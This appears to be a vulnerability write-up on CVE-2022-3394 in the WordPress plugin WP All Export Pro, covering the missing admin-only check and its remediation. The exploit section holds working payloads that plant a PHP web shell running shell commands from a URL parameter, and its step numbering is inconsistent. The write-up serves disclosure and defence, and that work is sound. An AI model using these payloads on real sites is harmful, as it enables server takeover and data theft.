Summary:  
CVE-2022-3394 uncovers a critical privilege escalation and remote code execution vulnerability in the WordPress plugin WP All Export Pro before version 1.7.9. Due to insufficient restriction of powerful features, any logged-in user granted the ability to run exports can execute arbitrary PHP code on the site—functionality that should be strictly reserved for administrators. This post dives deep into the vulnerability, reproducible steps, exploit details, and how to protect your WordPress site.

Background: What is WP All Export Pro?

WP All Export Pro is a popular WordPress plugin (over 20,000 active installs) used for exporting WordPress data (posts, users, WooCommerce orders) to various file formats. While only administrators are allowed to export data by default, the functionality can be delegated to other user roles via capability changes or membership plugins.

The Vulnerability

Reported and assigned as CVE-2022-3394 (NVD entry), the key issue is that the plugin does not restrict sensitive export hooks and features to just administrators. Any logged-in user with the 'export' capability (sometimes editors, authors, even regular users, based on admin configuration) can access export features. Critically, these features include the ability to execute custom PHP code during an export—intended as a powerful tool for data formatting, but extremely dangerous in the wrong hands.

1. The Core Flaw

In WP All Export Pro, users with export permissions can insert "Custom PHP functions" as part of their export templates. The plugin fails to enforce a check to verify that the user is an administrator before allowing execution of this code.

Vulnerable code (simplified)

```php
if ( current_user_can( 'export' ) ) {
    // Only the delegable 'export' capability is checked; there is no
    // administrator-only check (e.g. manage_options) before execution
    eval( $user_supplied_php_function );
}
```

This means *any* user with 'export' capability can reach code like this. By default, that's only administrators—but if your site's access controls have been modified, editors, authors, or even subscribers might have this access.

Many site owners delegate export permissions to other roles, for convenience or to reduce load on administrators, either via User Role Editor or via third-party membership plugins.

Note: Exploitation is only possible if 'export' capability is delegated to a non-admin user.

Example attack payload

```php
// PHP code injected as a "custom function" in export settings
file_put_contents(ABSPATH . '/pwned.php', '<?php echo shell_exec($_GET["cmd"]); ?>');
```

After running this export, the attacker navigates to https://example.com/pwned.php?cmd=ls to remotely execute shell commands on the server.

During export setup, when prompted to enter a custom function, enter this code:

```php
file_put_contents(ABSPATH . '/rce.php', '<?php system($_GET["cmd"]); ?>');
```

Complete and run the export.

6. The file rce.php is now in the WordPress root and can be accessed remotely to run arbitrary commands:

```
https://your-site.com/rce.php?cmd=whoami
```

Result:  
You have code execution as the web server user!

References

- NVD Entry for CVE-2022-3394
- WPScan Advisory
- Plugin Changelog
- Patch notes from WP All Export Pro Authors

Is My Site At Risk?

- Yes, if you are using WP All Export Pro < 1.7.9 and have granted export permissions to any non-administrator account (intentionally or via plugin/role changes).

Mitigation and Fix

Patch:  
The maintainers have resolved this in WP All Export Pro version 1.7.9. To protect your site:

1. Update WP All Export Pro to at least 1.7.9.

2. Review role/capability assignments for export functionality.
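A defender-side check for step 2, and for the missing privilege gate described under "The Core Flaw", as an added example that is not code from WP All Export Pro or its authors: a must-use plugin that reports every non-administrator role holding the 'export' capability (the precondition for this bug) and shows the administrator-only gate a code-executing feature should require. The `eca_` function names are hypothetical.

```php
<?php
/**
 * Plugin Name: Export Capability Audit (added example, not part of WP All Export Pro)
 * Place in wp-content/mu-plugins/ so it loads on every request.
 */

// Return the names of roles other than 'administrator' that carry 'export'.
// Note: capabilities granted directly to individual user accounts (not via a
// role) are not covered by this role-level audit; review those separately.
function eca_roles_with_export_cap() {
    $exposed = array();
    foreach ( wp_roles()->role_objects as $name => $role ) {
        if ( 'administrator' !== $name && $role->has_cap( 'export' ) ) {
            $exposed[] = $name;
        }
    }
    return $exposed;
}

// Hardened gate for any code path that evaluates user-supplied PHP:
// require the administrator-only capability, not the delegable 'export' one.
// (is_admin() is NOT a privilege check; it only tells whether an admin
// screen is being rendered.)
function eca_user_may_run_custom_php() {
    return current_user_can( 'manage_options' );
}

add_action( 'admin_init', function () {
    $exposed = eca_roles_with_export_cap();
    if ( empty( $exposed ) ) {
        return;
    }
    // Surface the finding in the PHP error log for the site operator.
    error_log( 'CVE-2022-3394 exposure: non-admin roles with the export capability: '
        . implode( ', ', $exposed ) );

    // Optional remediation: revoke the capability from those roles.
    // remove_cap() persists the change in the database, so keep this commented
    // out until you have confirmed the roles really should lose export access.
    // foreach ( $exposed as $name ) {
    //     get_role( $name )->remove_cap( 'export' );
    // }
} );
```

Run once as an administrator and check the PHP error log; an empty log line means no non-administrator role can reach the export feature through its role definition.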

Takeaways

Privilege boundaries in WordPress are only as strong as your plugin code. Any functionality that enables code execution should always check for *the highest level of privilege*, even if the capability can be assigned via roles. Plugins like WP All Export Pro must assume some administrators will delegate access—and code accordingly.

Exclusive for this article. Feel free to share and help secure the WordPress community!

If you use WP All Export Pro, update now and audit your site for unauthorized files and users.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 15:09:00 UTC